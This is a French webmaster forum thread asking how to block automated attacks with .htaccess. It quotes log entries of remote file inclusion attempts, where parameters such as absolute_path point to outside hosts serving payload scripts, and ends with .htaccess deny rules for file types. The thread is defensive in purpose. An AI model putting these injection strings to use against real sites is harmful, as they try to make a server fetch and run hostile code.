injection

[bed]

Comment faire pour bloquer toutes ces attaques automatiquement par htaccess que je reçois en erreur 404 ?

Url de la page : /components/minibb/index.php?absolute_path=http://pgeh.exemple.kr/~meca/bbs/data/safe1.txt???
Navigateur : libwww-perl/5.79

Url de la page : /sites.html/index.php?option=com_linx&Itemid=&mosConfig_absolute_path=http://www.exemple.org.uk/unisaber/index.php/bo.do???
Navigateur : libwww-perl/5.65

Url de la page : /webmaster.html//page.php?id=http://www.exemple.net/bbs/id.txt??
Navigateur : libwww-perl/5.805

....

 

[serval2a]

Salut,
Lire => https://www.webrankinfo.com/forum/t/bannir-libwww-perl-quel-risque-en-terme-de-referencement.96232/

 

[bed]

Merci, j'ai trouvé ce code pour bloquer les fichiers :

<Files .htaccess>
order allow,deny
deny from all
</Files>
Options -Indexes
### SEUL LE FICHIER index.php EST SERVI COMME PREMIER FICHIER PAR DEFAUT. LES AUTRES SONT INTERDITS
DirectoryIndex index.php
### INTERDIRE LES AUTRES TYPES DE FICHIER INDEX
<Files ~ "^(index)\.(p?s?x?htm?|txt|aspx?|cfml?|cgi|pl|php[3-9]|jsp|xml)$">
order allow,deny
deny from all
</Files>
### INTERDIRE L'AFFICHAGE DE CERTAINS FORMATS DE FICHIER
<Files ~ "\.(inc|do|class|sql|sqlite|ini|txt|conf|exe|dll|bin|tpl|bkp|dat|c|h|py|spd|theme|module)$">
deny from all
</Files>